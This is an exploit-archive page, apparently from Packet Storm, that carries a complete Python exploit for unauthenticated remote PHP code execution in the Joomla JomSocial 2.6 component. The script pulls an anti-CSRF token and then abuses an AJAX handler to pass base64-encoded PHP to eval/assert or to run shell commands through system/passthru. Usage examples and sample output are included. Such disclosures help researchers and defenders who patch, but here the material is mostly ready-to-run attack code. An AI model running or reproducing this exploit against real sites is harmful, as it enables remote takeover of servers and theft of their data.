Exploit the possiblities

Joomla JomSocial 2.6 Code Execution

Joomla JomSocial 2.6 Code Execution
Posted Jan 31, 2014
Authored by Matias Fontanini, Carlos Gaston Traberg

Joomla JomSocial component version 2.6 remote PHP code execution exploit.

tags | exploit, remote, php, code execution
MD5 | 2de6823a840b1df40cb6d64d7d514fbc

Joomla JomSocial 2.6 Code Execution

Change Mirror Download
#!/usr/bin/python
#
# Joomla! JomSocial component >= 2.6 PHP code execution exploit
#
# Authors:
# - Matias Fontanini
# - Gaston Traberg
#
# This exploit allows the execution of PHP code without any prior
# authentication on the Joomla! JomSocial component.
#
# Note that in order to be able to execute PHP code, both the "eval"
# and "assert" functions must be enabled. It is also possible to execute
# arbitrary PHP functions, without using them. Therefore, it is possible
# to execute shell commands using "system", "passthru", etc, as long
# as they are enabled.
#
# Examples:
#
# Execute PHP code:
# ./exploit.py -u http://example.com/index.php -p "echo 'Hello World!';"
# ./exploit.py -u http://example.com/index.php -p /tmp/script_to_execute.php
#
# Execute shell commands(using system()):
# ./exploit.py -u http://example.com/index.php -s "netstat -n"
#
# Exploit shell commands(using a user provided function, passthru in this case)
# ./exploit.py -u http://example.com/joomla/index.php -s "netstat -natp" -c passthru
#
# Exploit execution example:
# $ python exploit.py -u http://example.com/index.php -p 'var_dump("Hello World!");'
# [i] Retrieving cookies and anti-CSRF token... Done
# [+] Executing PHP code...
# string(12) "Hello World!"

import urllib, urllib2, re, argparse, sys, os

class Exploit:
token_request_data = 'option=com_community&view=frontpage'
exploit_request_data = 'option=community&no_html=1&task=azrul_ajax&func=photos,ajaxUploadAvatar&{0}=1&arg2=["_d_","Event"]&arg3=["_d_","374"]&arg4=["_d_","{1}"]'
json_data = '{{"call":["CStringHelper","escape", "{1}","{0}"]}}'

def __init__(self, url, user_agent = None, use_eval = True):
self.url = url
self._set_user_agent(user_agent)
self.use_eval = use_eval
self.token_regex = re.compile('<input type=\"hidden\" name=\"([\w\d]{32})\" value=\"1\" \/>')
self.cookie, self.token = self._retrieve_token()
self.result_regex = re.compile('method=\\\\"POST\\\\" enctype=\\\\"multipart\\\\/form-data\\\\"><br>(.*)<div id=\\\\"avatar-upload\\\\">', re.DOTALL)
self.command_regex = re.compile('(.*)\\[\\["as","ajax_calls","d",""\\]', re.DOTALL)

def _set_user_agent(self, user_agent):
self.user_agent = user_agent

def _make_opener(self, add_cookie = True):
opener = urllib2.build_opener()
if add_cookie:
opener.addheaders.append(('Cookie', self.cookie))
opener.addheaders.append(('Referer', self.url))
if self.user_agent:
opener.addheaders.append(('User-Agent', self.user_agent))
return opener

def _retrieve_token(self):
opener = self._make_opener(False)
sys.stdout.write('[i] Retrieving cookies and anti-CSRF token... ')
sys.stdout.flush()
req = opener.open(self.url, Exploit.token_request_data)
data = req.read()
token = self.token_regex.findall(data)
if len(token) < 1:
print 'Failed'
raise Exception("Could not retrieve anti-CSRF token")
print 'Done'
return (req.headers['Set-Cookie'], token[0])

def _do_call_function(self, function, parameter):
parameter = parameter.replace('"', '\\"')
json_data = Exploit.json_data.format(function, parameter)
json_data = urllib2.quote(json_data)
data = Exploit.exploit_request_data.format(self.token, json_data)
opener = self._make_opener()
req = opener.open(self.url, data)
if function == 'assert':
return req.read()
elif function in ['system', 'passthru']:
result = self.command_regex.findall(req.read())
if len(result) == 1:
return result[0]
else:
return "[+] Error executing command."
else:
result = self.result_regex.findall(req.read())
if len(result) == 1:
return result[0].replace('\\/', '/').replace('\\"', '"').replace('\\n', '\n')
else:
return "[+] Error executing command."

def call_function(self, function, parameter):
if self.use_eval:
return self.eval("echo {0}('{1}')".format(function, parameter))
else:
return self._do_call_function(function, parameter)

def disabled_functions(self):
return self.call_function("ini_get", "disable_functions")

def test_injection(self):
result = self.eval("echo 'HELLO' . ' - ' . 'WORLD';")
if 'HELLO - WORLD' in result:
print "[+] Code injection using eval works"
else:
print "[+] Code injection doesn't work. Try executing shell commands."

def eval(self, code):
if code [-1] != ';':
code = code + ';'
return self._do_call_function('assert', "@exit(@eval(@base64_decode('{0}')));".format(code.encode('base64').replace('\n', '')))



parser = argparse.ArgumentParser(
description="JomSocial >= 2.6 - Code execution exploit"
)
parser.add_argument('-u', '--url', help='the base URL', required=True)
parser.add_argument(
'-p',
'--php-code',
help='the PHP code to execute. Use \'-\' to read from stdin, or provide a file path to read from')
parser.add_argument('-s', '--shell-command', help='the shell command to execute')
parser.add_argument('-c', '--shell-function', help='the PHP function to use when executing shell commands', default="system")
parser.add_argument('-t', '--test', action='store_true', help='test the PHP code injection using eval', default=False)
parser.add_argument('-n', '--no-eval', action='store_false', help='don\'t use eval when executing shell commands', default=True)

args = parser.parse_args()
if not args.test and not args.php_code and not args.shell_command:
print '[-] Need -p, -t or -s to do something...'
exit(1)
url = args.url
try:
if not url.startswith('http://') and not url.startswith('https://'):
url = 'http://' + url
exploit = Exploit(url, use_eval=args.no_eval)
if args.test:
exploit.test_injection()
elif args.php_code:
code = args.php_code
if args.php_code == '-':
print '[i] Enter the code to be executed:'
code = sys.stdin.read()
elif os.path.isfile(code):
try:
fd = open(code)
code = fd.read()
fd.close()
except Exception:
print "[-] Error reading the file."
exit(1)
print '[+] Executing PHP code...'
print exploit.eval(code)
elif args.shell_command:
print exploit.call_function(args.shell_function, args.shell_command)
except Exception as ex:
print '[+] Error: ' + str(ex)

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

Want To Donate?


Bitcoin: 18PFeCVLwpmaBuQqd5xAYZ8bZdvbyEWMmU

File Archive:

January 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jan 1st
    2 Files
  • 2
    Jan 2nd
    13 Files
  • 3
    Jan 3rd
    16 Files
  • 4
    Jan 4th
    39 Files
  • 5
    Jan 5th
    26 Files
  • 6
    Jan 6th
    40 Files
  • 7
    Jan 7th
    2 Files
  • 8
    Jan 8th
    16 Files
  • 9
    Jan 9th
    25 Files
  • 10
    Jan 10th
    28 Files
  • 11
    Jan 11th
    44 Files
  • 12
    Jan 12th
    32 Files
  • 13
    Jan 13th
    2 Files
  • 14
    Jan 14th
    4 Files
  • 15
    Jan 15th
    31 Files
  • 16
    Jan 16th
    15 Files
  • 17
    Jan 17th
    16 Files
  • 18
    Jan 18th
    24 Files
  • 19
    Jan 19th
    7 Files
  • 20
    Jan 20th
    0 Files
  • 21
    Jan 21st
    0 Files
  • 22
    Jan 22nd
    0 Files
  • 23
    Jan 23rd
    0 Files
  • 24
    Jan 24th
    0 Files
  • 25
    Jan 25th
    0 Files
  • 26
    Jan 26th
    0 Files
  • 27
    Jan 27th
    0 Files
  • 28
    Jan 28th
    0 Files
  • 29
    Jan 29th
    0 Files
  • 30
    Jan 30th
    0 Files
  • 31
    Jan 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close